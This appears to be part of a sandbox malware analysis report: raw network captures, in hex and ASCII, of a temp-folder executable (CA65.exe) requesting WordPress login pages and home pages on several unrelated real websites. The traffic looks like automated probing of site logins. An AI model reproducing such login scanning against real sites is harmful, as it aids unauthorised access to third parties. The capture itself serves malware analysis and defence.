2023-12-22 20:15:15 UTC	597	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Result-Reason: Not Redirected X-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404 X-UA-Compatible: IE=edge Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly Set-Cookie: __RequestVerificationToken=lv8u40yKPPUMIKDIgRNHzmyM17-_9dV0J8sAUK195alUcXGzQkdn_ziuk0BDU6sZrT1Xdw2; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:15 GMT Connection: close Content-Length: 33325
2023-12-22 20:15:15 UTC	15787	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 46 43 36 36 47 35 43 43 37 50 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 Data Ascii: <!DOCTYPE html><html lang="en-US"><head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-FC66G5CC7P"></script><script> w
2023-12-22 20:15:16 UTC	16384	IN	Data Raw: 6e 74 20 4d 6f 64 32 73 78 63 61 70 70 43 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 63 2d 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 27 20 20 64 61 74 61 2d 63 62 2d 69 6e 73 74 61 6e 63 65 3d 27 37 30 36 27 20 64 61 74 61 2d 63 62 2d 69 64 3d 27 37 30 36 27 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 6d 79 2d 36 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 36 20 63 6f 6c 2d 6c 67 2d 33 20 74 65 78 74 2d 63 65 6e 74 65 72 20 6d 62 2d 35 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: nt Mod2sxcappC"><div class='sc-content-block' data-cb-instance='706' data-cb-id='706'><div class="container my-6"> <div class="row"> <div class="col-sm-6 col-lg-3 text-center mb-5 d-flex flex-column align-items-center">
2023-12-22 20:15:16 UTC	1154	IN	Data Raw: 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 73 6c 69 6d 6d 65 6e 75 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 6c 6c 69 70 73 69 73 2e 6d 69 6e 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 Data Ascii: 9" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.slimmenu.js?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.ellipsis.min.js?cdv=109" type="text

Session ID	Source IP	Source Port	Destination IP	Destination Port
351	192.168.2.4	59538	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=ib4okdprhacs3t0dbu7ha45v80; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/
2023-12-22 20:15:15 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 35 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 35 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:15 UTC	381	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 63 6c 70 63 56 6a 56 38 79 63 73 6a 59 76 55 36 34 6d 57 4e 53 62 46 32 51 6a 43 25 32 46 38 33 79 79 49 33 35 52 56 56 4f 31 4c 25 32 46 58 4e 4f 66 36 63 67 42 62 71 73 53 67 62 25 32 42 79 25 32 42 4f 65 78 57 53 37 76 39 6c 4a 58 74 42 33 46 38 45 35 49 35 33 54 44 6f 6f 55 4b 72 4f 6d 59 78 4d 44 44 57 41 5a 77 34 74 6f 59 4d 4a 25 32 42 33 75 49 25 32 46 45 71 41 43 65 4e 70 61 4a 6e 77 4d 6f 43 69 46 4e 69 6b 42 58 50 46 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=clpcVjV8ycsjYvU64mWNSbF2QjC%2F83yyI35RVVO1L%2FXNOf6cgBbqsSgb%2By%2BOexWS7v9lJXtB3F8E5I53TDooUKrOmYxMDDWAZw4toYMJ%2B3uI%2FEqACeNpaJnwMoCiFNikBXPF"}],"group":"cf-nel","max_age":60
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
2023-12-22 20:15:15 UTC	1369	IN	Data Raw: 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: ducebox.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script
2023-12-22 20:15:15 UTC	273	IN	Data Raw: 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f Data Ascii: pt" id="user-profile-js-extra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></
2023-12-22 20:15:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
352	192.168.2.4	59694	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	256	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	1304	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/; secure
2023-12-22 20:15:15 UTC	1399	IN	Data Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 35 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 35 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 Data Ascii: set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/; secureset-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:15 GMT; Max-Age=0; path=/; secureset
2023-12-22 20:15:15 UTC	5866	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
353	192.168.2.4	59576	91.132.253.137	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:15 UTC	184	OUT	GET /index.php/ HTTP/1.1 Host: www.flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:15 UTC	453	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:15 GMT Server: Apache Cache-Control: max-age=21600, s-maxage=21600 Pragma: public Expires: Fri, 22 Dec 2023 21:38:58 GMT Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:15 UTC	7739	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 0a 3c 74 69 74 6c 65 3e 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 20 2d 20 56 65 6e 74 65 20 4d 6f 62 69 6c 20 68 6f 6d 65 20 6e 65 75 66 73 20 2d 20 56 65 6e 74 65 20 4d 6f 62 69 6c 20 68 6f 6d 65 20 6f 63 63 61 73 69 6f 6e 20 2d 20 4d 6f 62 69 6c 2d 68 6f 6d 65 20 65 6e 20 70 72 6f 6d 6f 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 Data Ascii: 2000<!DOCTYPE html><html lang="fr" prefix="og: http://ogp.me/ns#"> <head> <title>Flandria Loisirs - Vente Mobil home neufs - Vente Mobil home occasion - Mobil-home en promotion</title><meta http-equiv="content-type" content="text/html; c
2023-12-22 20:15:15 UTC	459	IN	Data Raw: 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 69 64 3d 22 62 74 6e 2d 6f 70 65 6e 2d 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 62 74 6e 2d 6f 70 65 6e 2d 73 65 61 72 63 68 22 3e 3c 73 70 61 6e 20 75 6b 2d 69 63 6f 6e 3d 22 69 63 6f 6e 3a 20 73 65 61 72 63 68 3b 20 72 61 74 69 6f 3a 20 31 2e 34 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 76 69 73 69 62 6c 65 40 6c 22 3e 0a 20 20 Data Ascii: </a> <a id="btn-open-search" class="btn-open-search"><span uk-icon="icon: search; ratio: 1.4"></span></a> </div> </div> </div></header><div class="o-navigation" id="navigation"> <div class="uk-visible@l">
2023-12-22 20:15:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:16 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 69 6f 6e 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 5f 73 69 6d 70 6c 65 6f 5f 63 6f 74 65 6f 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2d 32 30 31 37 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 22 20 2f 3e 3c 2f 61 3e 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 75 6b 2d 77 69 64 74 68 2d 35 2d 36 40 6c 20 75 6b 2d 6e 61 76 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 20 75 6b 2d 6e 61 76 62 61 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 6f 2d 6d 65 6e 75 2d 64 65 73 6b 74 6f 70 20 22 20 75 6b 2d 6e 61 76 62 61 72 3e 0a 20 20 20 20 20 20 Data Ascii: 2000ion/themes/theme_simpleo_coteo/images/logo-flandria-loisirs-2017.png" itemprop="logo" alt="Flandria Loisirs" /></a> </div> <nav class="uk-width-5-6@l uk-navbar-container uk-navbar-transparent o-menu-desktop " uk-navbar>
2023-12-22 20:15:16 UTC	6	IN	Data Raw: 22 67 2d 74 65 78 Data Ascii: "g-tex
2023-12-22 20:15:16 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
